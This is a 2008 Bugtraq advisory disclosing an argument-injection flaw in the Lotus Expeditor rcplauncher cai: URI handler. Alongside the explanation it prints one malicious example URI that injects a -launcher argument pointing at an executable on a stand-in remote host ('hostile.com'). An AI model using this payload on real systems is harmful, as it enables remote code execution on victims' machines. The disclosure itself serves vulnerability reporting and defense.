Lotus expeditor rcplauncher uri handler vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Lotus expeditor rcplauncher uri handler vulnerability
- From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
- Date: Fri, 25 Apr 2008 17:04:02 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=PF3oxk427Ch3tW6M6Y5uLhI/LFt7QQ2NwZmew21aohs=; b=Bx0HLanCXySx4xVtzs6he0jZw2P6RYUXdfmMIZAD4thB/qOWiVLFle0ia6PK1LGSqDlQFvGHbtvOywWZU7PeTRP2xIxwDxZ8G0HQA+ceJ524BBpOrzrZKv/iA/p2iAL0IpudrpI6vQdP+7WEmCwuaYHofPxBYNICqhuiRdSck3o=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=SCBI4WTkulOX0N/n4iqsKgrsL4jbboYeV/RB0Hz+RHMBDBr9CS7JjsZVsP0SN+VMAmKaw4QeNaCjLqhl0CQzI2EIL6up9yUKey6tcRYFpTGIVbtVOwHvQTU/EWzPLOG91+84Obo7KONdiZj6MIhrkZlAwBkOBWbL6HqJVAKJrEw=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Hello
Lotus expeditor rcplauncher registers a cai: uri handler.
This handler executes
"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe"
-config notes -com.ibm.rcp.portal.app.ui#openCA "%1"
the rcplauncher process accepts various arguments which can be abused
to execute arbitrary code.
The argument to the -launcher option for example is an executable
that will be executed.
malicious uri example:
cai:"%20-launcher%20\\hostile.com\d$\trojan
original advisory :
http://thomas.pollet.googlepages.com/lotusexpeditorurihandlervulnerability
Regards,
Thomas Pollet